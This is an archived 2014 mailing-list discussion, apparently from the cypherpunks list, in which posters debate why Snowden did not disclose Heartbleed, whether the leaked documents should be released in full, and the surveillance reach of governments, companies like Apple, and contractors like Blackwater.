<2025530288.47217.1397506109407.JavaMail.www@wwinf8305> <1603449.SJ9FqTUdKW@lap> <972157717.55906.1397529975026.JavaMail.www@wwinf8315> Message-ID: <534D7466.4040906@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/14/2014 07:46 PM, tpb-crypto at laposte.net wrote: > One could argue that laws which punish hacking as a higher offense > than rape is a byproduct of stupid politicians scared by technology > which they don't have > any understanding of. Perhaps it is due to their thinking that technology poses a serious threat to their power bases. - -- The Doctor [412/724/301/703] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ ...that's the same combination I've got on my luggage! -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEAREKAAYFAlNNdGYACgkQO9j/K4B7F8FifACdFDxFrwd8r9qzFwd6PoMtsDsd eOUAn3JugOpwfpP9gFDK/PSWHdbDMnNe =Moy0 -----END PGP SIGNATURE----- From shelley at misanthropia.info Tue Apr 15 13:34:46 2014 From: shelley at misanthropia.info (shelley at misanthropia.info) Date: Tue, 15 Apr 2014 13:34:46 -0700 Subject: Why didn't Snowden disclose Heartbleed (and others)? In-Reply-To: <534D8446.7010508@cpunk.us> References: <534D8446.7010508@cpunk.us> Message-ID: <1397594086.11002.106883253.56A2052F@webmail.messagingengine.com> On Tue, Apr 15, 2014, at 12:11 PM, Cypher wrote: [...] > I say fuck national security. These guys are burning down the entire world just >them to further their agenda. They deserve no consideration, even if it does put >a disadvantage. +1! They put the entire world of e-commerce and communication at a disadvantage by intentionally weakening encryption standards. Fuck them with a chainsaw. Drop the whole cache of Snowden docs at once, let the sunlight in and watch these crooked coackroach fucks shit themselves in panic. From cypher at cpunk.us Tue Apr 15 12:11:02 2014 From: cypher at cpunk.us (Cypher) Date: Tue, 15 Apr 2014 14:11:02 -0500 Subject: Why didn't Snowden disclose Heartbleed (and others)? In-Reply-To: References: Message-ID: <534D8446.7010508@cpunk.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/15/2014 11:16 AM, Lodewijk andré de la porte wrote: > Exhaustive list of possibilities (please extend where possible): A > Did not know B Did not care C Felt like it would negatively impact > the NSA's (legitimate) functioning D Didn't get around to it yet E > Snowden is an unconventional NSA set up F Snowden's documents are > not recent enough Personally, I'm going with D but with some caveats. Snowden has long preached the 'encryption works but the endpoints are so weak that it often doesn't matter'. I've always read this as 'encryption works when it's done right. And it's almost never done right'. This might have been a hint about Heartbleed, but I doubt it. I don't see Snowden as the type of man who'd put the entire world's security at risk just in the interests of US National Security. This is why I've long been an advocate of total disclosure. I think the document holders should publish everything they have. After they do that, they could continue to 'leak release' documents with detailed explanations for those who are too lazy or too confused by the documents to sift through them and read them but having a document dump out there would make the process of disclosure /much/ faster. And it would freak the NSA out - a happy plus. I say fuck national security. These guys are burning down the entire world just to further their agenda. They deserve no consideration, even if it does put them at a disadvantage. Me - -- Want to communicate with me privately? Find my PGP public key here: http://pgp.mit.edu/pks/lookup?op=get&search=0x5BAEB5B2FA26826B Fingerprint: 6728 40CE 35EE 0BF3 2E15 C7CC 5BAE B5B2 FA26 826B -----BEGIN PGP SIGNATURE----- Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCgAGBQJTTYRGAAoJEFuutbL6JoJrQq8P/ibFbU9oBLG0NPY4EQYUDWNu EkCwnF85wx6HIteAxMaRYRyG9JHzNuXIE27/0+jcgStB3zz9Qis7LXvMOziH485x Rc0vJshsvseuInSaPDfR91Infy0KDpvuSgCSFib1ZnmGFaKrBtNE0cciAnrb3+La 0CoG6wMiyS1RuTJnb48y3Jr2cqsswXcl/6CkgU9hLsjGcTucoUv0tRa1IBJslv4s JxWS0KE0ww/pwF32LCRD1LQIDMScbtgD5vZtZrxUc2FmgFubOPzbXVQ4/IU9tmTA +8pHNBQfXY0OQ2WpraMNyjHSMfeZtEd6xgWOhekCM3ARhwPLlA9AZV3IDWcHWv// kappxWfL2J1quycc/ujGkQlIvGG7xLFen5fkRL5cz+I6E99uaR5Om/HF2qNsvudB bHThid3RS9AK07sm8HDBjOj9FVFA5XMFwwPamBf9UQjQllfm7RycAMczgc5tyYx6 FHojMzvRRbc6kXT4eWbWjWwC/dug8u7dcjKrvpfJh15v2JTHOmwU0ww36/Ib3gBu 5CKDqz+w5KI5cUDWaKZ8FmNuAZs0d0K9crCHQoPwQxGAsoxVzoQvxhDyDZ3tXVxS CPb/wr08M+oBdWYAM9FVNQRmQfynkXGcximSQr76yNHKXEbiL97U7gh9uWwcJZSX GIbXR2xNqQocEXnfKHAJ =yzRN -----END PGP SIGNATURE----- From jamesdbell9 at yahoo.com Tue Apr 15 16:57:06 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Tue, 15 Apr 2014 16:57:06 -0700 (PDT) Subject: Fw: Why didn't Snowden disclose Heartbleed (and others)? In-Reply-To: <1397606160.81525.YahooMailNeo@web126203.mail.ne1.yahoo.com> References: <534D8446.7010508@cpunk.us> <1397606160.81525.YahooMailNeo@web126203.mail.ne1.yahoo.com> Message-ID: <1397606226.48907.YahooMailNeo@web126204.mail.ne1.yahoo.com> From:jim bell From:Lodewijk andré de la porte 2014-04-15 21:11 GMT+02:00 Cypher : This is why I've long been an advocate of total disclosure. I think >the document holders should publish everything they have. After they >do that, they could continue to 'leak release' documents with detailed >explanations for those who are too lazy or too confused by the >documents to sift through them and read them but having a document >dump out there would make the process of disclosure /much/ faster. >The problem is that the general public is very slow to learn. Every step along the way even the wise said things >like "OH! The NSA said A, but they'll never say B!". Then two weeks later the docs show that B has not just >been said, it'd been SCREAMED. Then the word is "But they'll never say C!". Etc. Maybe at some point >people will pick it up differently. >It also fits the media format better to drip info. A new news article every new drip. That makes for a lot more >exposure. If they are going to 'drip, drip, drip' it, they should release it all first in hashed form, so that: 1.    We ultimately know we get it all. 2.    We know it hasn't been modified from the form it was originally in.                  Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3987 bytes Desc: not available URL: From l at odewijk.nl Tue Apr 15 08:28:26 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Tue, 15 Apr 2014 17:28:26 +0200 Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug In-Reply-To: <20140415124225.90DA72280BF@palinka.tinho.net> References: <02A63D1F-D387-4CD7-85CB-F1299522B632@gmail.com> <20140415124225.90DA72280BF@palinka.tinho.net> Message-ID: 2014-04-15 14:42 GMT+02:00 : > Granted, automation (in the West) > may beat massed manual labor (in the East), but for me and thee the > differences in method seem not to matter in the short run. > They use biological machines there. Very flexible. Harder to keep in working order, but the Chinese have made great progress. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 682 bytes Desc: not available URL: From l at odewijk.nl Tue Apr 15 08:42:41 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Tue, 15 Apr 2014 17:42:41 +0200 Subject: NSA good guys In-Reply-To: <972157717.55906.1397529975026.JavaMail.www@wwinf8315> References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> <1603449.SJ9FqTUdKW@lap> <972157717.55906.1397529975026.JavaMail.www@wwinf8315> Message-ID: > > I noticed something interesting in digital 'security' circles. People who > deal with 'security' are, at first sight, technical people and are > concerned with issues such as factoring integers, permutations, routing > protocols, etc. etc. etc. > > However, all their technical expertise exists to achieve some political > goals. And when you look at the political beliefs of these people, you see > that they suck big time. As engineers they may be competent, but there's a > step above engineering, and there, they fail. > A statement like this is trollbait. It might not be intentional, you might even have a valid point, but presenting it like this will not help. If you're talking about a step above pure technical you're usually talking about a software's purpose. Then that purpose can be influenced by a political believe as vague as anarchy, democracy, communism, capitalism, liberty, etc. which are words that should be used sparingly and in a way that acknowledges how terribly vague they are. I think it's not right to say their technical expertise exists to serve certain goals, many are doing it just for the hell of it. For the puzzles, the challenges. And then we have angry Juan > And what I'm getting at is that there are people in the 'security' > industry who either consider politicians and the state to be a 'necessary > evil', or worse, think that politicians and the political system they > serve, are A Good Thing. > Inpersonal, unclear, unmotivated. Where do you live Juan? America? Or somewhere lawless like Nigeria? There's an evolutionary system to governments, where the system rises or falls based on its fitness. Why doesn't your ideal system exist yet, and if it's stable but hard to reach, how will you create it? There's constructive ways to deal with this. > In a nearby mailing list, there are a bunch of people who are funded by > the american military(psycho killers) to create a so called 'anomity > network'. Regardless of how good they are at writing code, their political > beliefs are sick garbage. They operate on the laughable premise that they > are the 'good guys' > Calling a person psycho is very relative, they have a model of reality. IMHO it holds well enough for them not to be "psycho". They're definitely killers, but that's what the military is supposed to be. So afaics everything is okay. The (US) government on one angle performing mass surveillance and on the other hand preventing surveillance makes perfect sense to me. They're different agencies, different people, different incentives, so the conclusions (doing/preventing mass surveillance) are the correct ones in both cases. The government working against itself is extremely common, sometimes intentional, and a symbol of what's wrong with it. Sadly it's also a symbol of what's wrong with capitalism. And anarchy (as you usually advocate) implies capitalism, although it might not be about capital. Just the struggle for ownership and control and an evolutionary process of "consumer selection" to find the optimal situation or product. Sounds idealistic? Now look upon anarchy again. Same people who, when called out on the source of their funding have one > argument : "you're a tinfoil conspiracy theorist!" (Wait, of course, that's > not an argument, just puerile name-calling) > I still think tinfoil hats are underrated. Van Eck phreaking of neural network interference patterns is fiction now, but the radiation is there. More on topic, you sound like you are indeed a conspiracy theorist. You throw around little to no evidence in an emotional manner, and jump to conclusions. Do the Tor guys get US GOV funding? Yes. Does that mean they're biased? It could, but it doesn't guarantee it. Does it imply they're biased? Kinda, yeah. Does that mean you can't trust them? Well, I honestly don't know. In some cases it does. Does that mean Tor is backdoored? It probably is, and would've been without USGOV funding. If it wasn't backdoored it's almost certainly (at some level) exploited, Heartbleed is here to prove that. Which makes me wonder, why didn't Snowden disclose Heartbleed? I'll make a thread about that. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5201 bytes Desc: not available URL: From dan at geer.org Tue Apr 15 14:55:40 2014 From: dan at geer.org (dan at geer.org) Date: Tue, 15 Apr 2014 17:55:40 -0400 Subject: NSA good guys In-Reply-To: Your message of "Tue, 15 Apr 2014 11:03:18 PDT." <534D7466.4040906@virtadpt.net> Message-ID: <20140415215540.5D74322807F@palinka.tinho.net> All the whining about NSA is just that, whining, by comparison to where COTS is going. The COTS folks are surpassing national labs in the reach of their traffic analysis, they just don't yet have the command structure. (They'll get one when they're deputized by the national labs of whatever country matters.) Consider AAPL's iBeacon. --- consumer market prepositioning drives tracking rollout --- http://www.pfhub.com/apple-inc-s-aapl-ios-leaps-ahead-of-googles-android-in-the -new-world-of-beacons-542 > The iBeacon is spreading rapidly in a number of spheres, including > retail, sports arenas, museums, and possibly even the home. An even > more crucial factor, however, is how many devices running a given > operating system are beacon-ready. iOS devices are 82% beacon ready, > according to a report today from Patently Apple, while Android > devices are only 2.5% beacon ready. > > Being successful in the world of beacon technology draws the > business of huge retailers with deep advertising budgets, with a > potential windfall of cash when these companies pay for access to > both beacons and the server space that backs them up. --- turning it off is a useful illusion --- http://support.apple.com/kb/HT5594 > You must enable Location Services on your device and give your > http://support.apple.com/kb/HT5594 permission to each app or website > before it can use your location data. In iOS 7, if you turn off > Location Services and use Find My iPhone Lost Mode, Location Services > will be re-enabled on the device as long as the device is in Lost > Mode. Once Lost Mode is disabled, Location Services will return to > its previous state. > > Note: For safety purposes, your iPhones location information will > be used for emergency calls to aid response efforts regardless of > whether you enable Location Services. --- everybody's ass is covered in layers of boilerplate --- http://support.apple.com/kb/HT6048 > Note: If you allow third-party apps or websites to use your current > location, you agree to their terms, privacy policies, and practices. > You should review the terms, privacy policies, and practices of the > apps and websites to understand how they use your location and other > information. Information Apple collects will be treated in accordance > with Apple's Privacy Policy. --- standards, schmandards --- http://www.mobilemarketinguniverse.com/bluetooth-beacons-vs-wifi-vs-nfc-2 > After Apple choose BLE as standard rather than NFC/RFID, we believe > that the two winning technologies in North America will be Wifi > and BLE whereas NFC still has a good chance in the rest of the > world. --dan From l at odewijk.nl Tue Apr 15 09:16:15 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Tue, 15 Apr 2014 18:16:15 +0200 Subject: Why didn't Snowden disclose Heartbleed (and others)? Message-ID: Exhaustive list of possibilities (please extend where possible): A Did not know B Did not care C Felt like it would negatively impact the NSA's (legitimate) functioning D Didn't get around to it yet E Snowden is an unconventional NSA set up F Snowden's documents are not recent enough A, is interesting, as it would show that the NSA has levels of secrecy and secret data that go further than what they had so far. Something above "TOP SECRET" should probably exist, and Snowden didn't find it. This actually makes a lot of sense to me, so it might well be it. B, he might think it's not very interesting. Using 0-days should be old-hat and expected. Disclosing specific exploits would not stop the bleeding, the NSA would just find new ones. He might even consider 0-day hoarding acceptable business, just not the mass employment of them. C, he's often maintained a sort of "I'm coming out to the public with this, but I'm very sorry to hurt the US in a way"- kind of attitude. It would definitely cripple the NSA if he released novel and important bugs. Think of how hard it would be to hack-back at China! D, There's some scheduling going on to maximize impact. He might release the "0-day-exploit list that endangers live as we know it, and the NSA did nothing" later, when attention dies down again. E, Maybe the NSA have become a common thing in popular culture and they dislike their image of being a completely opaque organization with potentially unlimited power. So now they are sharing information about the "outer shell" of the organization, a sort of facade. Meanwhile it seems like the world is crushing down upon them. In a few years their image will be renewed. Everyone will think "The NSA was not that unlimited in it's capabilities and worked very hard. Now that they have rules and limits it will all be okay". And with that a whole new level of FUD will have been achieved. Making people believe they are the evil you know. Of course, this is religious level conspiracies. And of course, that's exactly the level the NSA would start to accept. They're the information and espionage experts. If anyone could pull this off, it'd be them. (Didn't the CIA/NSA own the media? Don't they still? This might be easier than you'd expect) F, I couldn't find exactly to which date his documents go. Heartbleed was merged December 31 2011 (lonely night? sneaky vacation timing?). Assuming the NSA checks patches (ofc they do) they should've found it in Jan 2012. Snowden. Ah. Found it. "reenwald began working with Snowden in either February[113] or in April after Poitras asked Greenwald to meet her in New York City, at which point Snowden began providing documents to them both" That'd be April 2013. He still might've stolen the documents earlier, but who knows? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3262 bytes Desc: not available URL: From guninski at guninski.com Tue Apr 15 09:47:54 2014 From: guninski at guninski.com (Georgi Guninski) Date: Tue, 15 Apr 2014 19:47:54 +0300 Subject: Why didn't Snowden disclose Heartbleed (and others)? In-Reply-To: References: Message-ID: <20140415164754.GB2526@sivokote.iziade.m$> On Tue, Apr 15, 2014 at 06:16:15PM +0200, Lodewijk andré de la porte wrote: > Exhaustive list of possibilities (please extend where possible): > A Did not know > B Did not care > C Felt like it would negatively impact the NSA's (legitimate) functioning > D Didn't get around to it yet > E Snowden is an unconventional NSA set up > F Snowden's documents are not recent enough > > A, is interesting, as it would show that the NSA has levels of secrecy and > secret data that go further than what they had so far. Something above "TOP > SECRET" should probably exist, and Snowden didn't find it. This actually > makes a lot of sense to me, so it might well be it. > The short answer to the question in the subject is that HB is not worth using if you can execute remote code on openssl (call me a troll just because you disagree). As for above TOP secret: I don't believe snowden's documents about Tor reflect the current evilness of NSA -- just don't trust what the NSA/snowden allegedly disclose about Tor. Some targets got in jail for naively using Tor (check thereg). Reference for the Tor documents is the ACLU mirror of snowden. Probably this drama is explained by the saying: "A society of sheep deserves a government of wolves". > B, he might think it's not very interesting. Using 0-days should be old-hat > and expected. Disclosing specific exploits would not stop the bleeding, the > NSA would just find new ones. He might even consider 0-day hoarding > acceptable business, just not the mass employment of them. > > C, he's often maintained a sort of "I'm coming out to the public with this, > but I'm very sorry to hurt the US in a way"- kind of attitude. It would > definitely cripple the NSA if he released novel and important bugs. Think > of how hard it would be to hack-back at China! > > D, There's some scheduling going on to maximize impact. He might release > the "0-day-exploit list that endangers live as we know it, and the NSA did > nothing" later, when attention dies down again. > > E, Maybe the NSA have become a common thing in popular culture and they > dislike their image of being a completely opaque organization with > potentially unlimited power. So now they are sharing information about the > "outer shell" of the organization, a sort of facade. Meanwhile it seems > like the world is crushing down upon them. > > In a few years their image will be renewed. Everyone will think "The NSA > was not that unlimited in it's capabilities and worked very hard. Now that > they have rules and limits it will all be okay". And with that a whole new > level of FUD will have been achieved. Making people believe they are the > evil you know. > > Of course, this is religious level conspiracies. And of course, that's > exactly the level the NSA would start to accept. They're the information > and espionage experts. If anyone could pull this off, it'd be them. > > (Didn't the CIA/NSA own the media? Don't they still? This might be easier > than you'd expect) > > F, I couldn't find exactly to which date his documents go. Heartbleed was > merged December 31 2011 (lonely night? sneaky vacation timing?). Assuming > the NSA checks patches (ofc they do) they should've found it in Jan 2012. > Snowden. Ah. Found it. "reenwald began working with Snowden in either > February[113] or in April after Poitras asked Greenwald to meet her in New > York City, at which point Snowden began providing documents to them both" > That'd be April 2013. > > He still might've stolen the documents earlier, but who knows? From tpb-crypto at laposte.net Tue Apr 15 12:04:56 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Tue, 15 Apr 2014 21:04:56 +0200 Subject: NSA good guys In-Reply-To: <534D7466.4040906@virtadpt.net> References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> <1603449.SJ9FqTUdKW@lap> <972157717.55906.1397529975026.JavaMail.www@wwinf8315> <534D7466.4040906@virtadpt.net> Message-ID: <1493357443.123660.1397588696119.JavaMail.www@wwinf8310> > Message du 15/04/14 20:34 > De : "The Doctor" > > > One could argue that laws which punish hacking as a higher offense > > than rape is a byproduct of stupid politicians scared by technology > > which they > don't have > > any understanding of. > > Perhaps it is due to their thinking that technology poses a serious > threat to their power bases. > Well, that fear was shared by religious authorities of all stripes a few centuries ago, regarding science. And religious authorities were right about their fears, their power is gone. Considering that politicians are not so stupid, the fight will be harder this time. From l at odewijk.nl Tue Apr 15 14:53:42 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Tue, 15 Apr 2014 23:53:42 +0200 Subject: Why didn't Snowden disclose Heartbleed (and others)? In-Reply-To: <534D8446.7010508@cpunk.us> References: <534D8446.7010508@cpunk.us> Message-ID: 2014-04-15 21:11 GMT+02:00 Cypher : > This is why I've long been an advocate of total disclosure. I think > the document holders should publish everything they have. After they > do that, they could continue to 'leak release' documents with detailed > explanations for those who are too lazy or too confused by the > documents to sift through them and read them but having a document > dump out there would make the process of disclosure /much/ faster. > The problem is that the general public is very slow to learn. Every step along the way even the wise said things like "OH! The NSA said A, but they'll *never* say B!". Then two weeks later the docs show that B has not just been said, it'd been SCREAMED. Then the word is "But they'll never say C!". Etc. Maybe at some point people will pick it up differently. It also fits the media format better to drip info. A new news article every new drip. That makes for a lot more exposure. It's sad but true. I would *LOVE* instant full disclosure. But it just wouldn't have the same effect. Maybe you could do selective full disclosure, but who'd be allowed access? And who'd prevent the store of data from being leaked again? Additionally there's the rewriting and securing. Often documents have person-specific typo's or sentence changes that can identify a specific instance of a document. There was this company that wanted to use it on e-books, rewriting "good" to "not bad", etc. Anyway, mixed bag regarding full disclosure. I think this is easier, safer and reaches the general public better and as such it's the right choice. It's a damn shame that it is, sensationalism isn't fun. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2413 bytes Desc: not available URL: From gfoster at entersection.org Tue Apr 15 23:42:55 2014 From: gfoster at entersection.org (Gregory Foster) Date: Wed, 16 Apr 2014 01:42:55 -0500 Subject: NSA good guys In-Reply-To: <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> References: Your message of "Tue, 15 Apr 2014 11:03:18 PDT." <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> Message-ID: <534E266F.9000507@entersection.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > Companies cannot seize your property, put you in jail and queue you > to the death row. http://en.wikipedia.org/wiki/Academi > The company received widespread publicity in 2007 when a group of > its employees shot at Iraqi civilians killing 17 and injuring 20 in > Nisour Square, Baghdad. ... Blackwater was also hired during the > aftermath of Hurricane Katrina by the United States Department of > Homeland Security, as well as by private clients, including > communications, petrochemical and insurance companies. gf - -- Gregory Foster || gfoster at entersection.org @gregoryfoster <> http://entersection.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.19 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBCgAGBQJTTiZrAAoJEMaAACmjGtgjAX8P/3ISkcXYU6iE79v10sXonlf0 sGDiW2y4Fi7sgQC4m4z1J+8bSS/X1l63ms3u4e8OjB5tE3/SgNp6hTFuOVzwmVdl pIHloSm7pWVb4bU48w06IVr4EctkzWJn2WfA+AvPBCx5eDp6RKrgC9TBDGz3bNF+ ZYz9PxekEo6O7oxD6V2ywZ7egx65BoUN6VHuJjIm4bDca/T8vNSLWmw+cMqAy/Wl +kr3BAHF/FpGclef339RwRmJj+nChu45uiOoBpdQSTBtg79J9/iQOyjk4PYvdVjw AytHFp3zEXKf7GVUZfc0+pPMbFxrlOQoStCARbHOYK9oXmtDcNeauoRIAWbY7NYN bTSACIfrTaTjCA41Sfoj2ABsqRRO0GcbxWghKOME0F2lUWcyWkQmxxUclTHgtwCq +oGoeGwSXyTEAa9mWb2FyDRJn6boNZiKq3tTeoYQm+Wp9yvy0baGl2hfn3rl5C/T 2p+9G2g5bK4mRgorewVqp0YqJXZuTgbL4O2Zc/hATPBwQ23qSsJ8EX3mMkM8UhJH NU2BQX/ddlg5hivTyBrmLDbiQtZ5qNZmDTXjTHKF2vVJubacxW+RJ+jG8OtE2X3s jCeoUdOAZEhp8RNtiQ6ESaaVlh7Hewmz6RZEDrjHwBAzZeDb0eWblEzqLrQio3Aw VPfzWPfkCOR+z0Wf2hkN =wTjj -----END PGP SIGNATURE----- From coderman at gmail.com Wed Apr 16 04:55:27 2014 From: coderman at gmail.com (coderman) Date: Wed, 16 Apr 2014 04:55:27 -0700 Subject: NSA good guys In-Reply-To: <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> Message-ID: On Tue, Apr 15, 2014 at 9:40 PM, wrote: >... > Companies cannot seize your property, put you in jail and queue you to the death row. it takes a "strategic partner" to do that ;) we should be deeply concerned about both government and private industry privacy invasion, as they're both faces of unrestrained incentives working against our interests; both especially effective at eroding our privacy toward different ends via shared means. "The Intercept" has still not published leaks relevant to PayPal's involvement in PRISM(like) collection... From tpb-crypto at laposte.net Tue Apr 15 21:40:44 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Wed, 16 Apr 2014 06:40:44 +0200 Subject: NSA good guys In-Reply-To: <20140415215540.5D74322807F@palinka.tinho.net> References: Your message of "Tue, 15 Apr 2014 11:03:18 PDT." <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> Message-ID: <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> > Message du 16/04/14 01:25 > De : dan at geer.org > A : cypherpunks at cpunks.org > Copie à : > Objet : Re: NSA good guys > > > All the whining about NSA is just that, whining, by comparison to > where COTS is going. The COTS folks are surpassing national labs > in the reach of their traffic analysis, they just don't yet have > the command structure. (They'll get one when they're deputized by > the national labs of whatever country matters.) > > Consider AAPL's iBeacon. > > --- consumer market prepositioning drives tracking rollout --- > http://www.pfhub.com/apple-inc-s-aapl-ios-leaps-ahead-of-googles-android-in-the > -new-world-of-beacons-542 > > The iBeacon is spreading rapidly in a number of spheres, including > > retail, sports arenas, museums, and possibly even the home. An even > > more crucial factor, however, is how many devices running a given > > operating system are beacon-ready. iOS devices are 82% beacon ready, > > according to a report today from Patently Apple, while Android > > devices are only 2.5% beacon ready. > > > > Being successful in the world of beacon technology draws the > > business of huge retailers with deep advertising budgets, with a > > potential windfall of cash when these companies pay for access to > > both beacons and the server space that backs them up. > > --- turning it off is a useful illusion --- > http://support.apple.com/kb/HT5594 > > You must enable Location Services on your device and give your > > http://support.apple.com/kb/HT5594 permission to each app or website > > before it can use your location data. In iOS 7, if you turn off > > Location Services and use Find My iPhone Lost Mode, Location Services > > will be re-enabled on the device as long as the device is in Lost > > Mode. Once Lost Mode is disabled, Location Services will return to > > its previous state. > > > > Note: For safety purposes, your iPhones location information will > > be used for emergency calls to aid response efforts regardless of > > whether you enable Location Services. > > --- everybody's ass is covered in layers of boilerplate --- > http://support.apple.com/kb/HT6048 > > Note: If you allow third-party apps or websites to use your current > > location, you agree to their terms, privacy policies, and practices. > > You should review the terms, privacy policies, and practices of the > > apps and websites to understand how they use your location and other > > information. Information Apple collects will be treated in accordance > > with Apple's Privacy Policy. > > --- standards, schmandards --- > http://www.mobilemarketinguniverse.com/bluetooth-beacons-vs-wifi-vs-nfc-2 > > After Apple choose BLE as standard rather than NFC/RFID, we believe > > that the two winning technologies in North America will be Wifi > > and BLE whereas NFC still has a good chance in the rest of the > > world. > > > --dan > > Companies cannot seize your property, put you in jail and queue you to the death row. From juan.g71 at gmail.com Wed Apr 16 02:57:17 2014 From: juan.g71 at gmail.com (Juan) Date: Wed, 16 Apr 2014 06:57:17 -0300 Subject: NSA good guys In-Reply-To: <534E266F.9000507@entersection.org> References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> Message-ID: <534e5405.c5bd3a0a.3f3d.424a@mx.google.com> On Wed, 16 Apr 2014 01:42:55 -0500 Gregory Foster wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > > Companies cannot seize your property, put you in jail and queue you > > to the death row. > > http://en.wikipedia.org/wiki/Academi > > > The company received widespread publicity in 2007 when a group of > > its employees shot at Iraqi civilians killing 17 and injuring 20 in > > Nisour Square, Baghdad. ... Blackwater was also hired during the > > aftermath of Hurricane Katrina by the United States Department of > > Homeland Security, as well as by private clients, including > > communications, petrochemical and insurance companies. > > gf Well, 1) blackwater is a creation of 'ex' murderers from the american military 2) blackwater operates with a 'licence'(to kill) from the american government > > - -- > Gregory Foster || gfoster at entersection.org > @gregoryfoster <> http://entersection.com/ > -----BEGIN PGP SIGNATURE----- > Version: GnuPG/MacGPG2 v2.0.19 (Darwin) > Comment: GPGTools - http://gpgtools.org > > iQIcBAEBCgAGBQJTTiZrAAoJEMaAACmjGtgjAX8P/3ISkcXYU6iE79v10sXonlf0 > sGDiW2y4Fi7sgQC4m4z1J+8bSS/X1l63ms3u4e8OjB5tE3/SgNp6hTFuOVzwmVdl > pIHloSm7pWVb4bU48w06IVr4EctkzWJn2WfA+AvPBCx5eDp6RKrgC9TBDGz3bNF+ > ZYz9PxekEo6O7oxD6V2ywZ7egx65BoUN6VHuJjIm4bDca/T8vNSLWmw+cMqAy/Wl > +kr3BAHF/FpGclef339RwRmJj+nChu45uiOoBpdQSTBtg79J9/iQOyjk4PYvdVjw > AytHFp3zEXKf7GVUZfc0+pPMbFxrlOQoStCARbHOYK9oXmtDcNeauoRIAWbY7NYN > bTSACIfrTaTjCA41Sfoj2ABsqRRO0GcbxWghKOME0F2lUWcyWkQmxxUclTHgtwCq > +oGoeGwSXyTEAa9mWb2FyDRJn6boNZiKq3tTeoYQm+Wp9yvy0baGl2hfn3rl5C/T > 2p+9G2g5bK4mRgorewVqp0YqJXZuTgbL4O2Zc/hATPBwQ23qSsJ8EX3mMkM8UhJH > NU2BQX/ddlg5hivTyBrmLDbiQtZ5qNZmDTXjTHKF2vVJubacxW+RJ+jG8OtE2X3s > jCeoUdOAZEhp8RNtiQ6ESaaVlh7Hewmz6RZEDrjHwBAzZeDb0eWblEzqLrQio3Aw > VPfzWPfkCOR+z0Wf2hkN > =wTjj > -----END PGP SIGNATURE----- From europus at gmail.com Wed Apr 16 04:10:50 2014 From: europus at gmail.com (Ulex Europae) Date: Wed, 16 Apr 2014 07:10:50 -0400 Subject: NSA good guys In-Reply-To: <534E266F.9000507@entersection.org> References: <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> Message-ID: <534e6539.63d8440a.17ce.013a@mx.google.com> At 02:42 AM 4/16/2014, Gregory Foster wrote: >On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > > Companies cannot seize your property, put you in jail and queue you > > to the death row. > >http://en.wikipedia.org/wiki/Academi > > > The company received widespread publicity in 2007 when a group of > > its employees shot at Iraqi civilians killing 17 and injuring 20 in > > Nisour Square, Baghdad. ... Blackwater was also hired during the > > aftermath of Hurricane Katrina by the United States Department of > > Homeland Security, as well as by private clients, including > > communications, petrochemical and insurance companies. Do you have any evidence that any of those victims were targeted for any reason other than being in the wrong place at the wrong time? You seem to be conflating war with companies exercising a variant of eminent domain. From jya at pipeline.com Wed Apr 16 06:36:52 2014 From: jya at pipeline.com (John Young) Date: Wed, 16 Apr 2014 09:36:52 -0400 Subject: NSA good guys In-Reply-To: <534e6539.63d8440a.17ce.013a@mx.google.com> References: <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> <534e6539.63d8440a.17ce.013a@mx.google.com> Message-ID: "Wrong place at the wrong time." This is the platinum defense Blackwater and the USG used to excuse the murders. And the 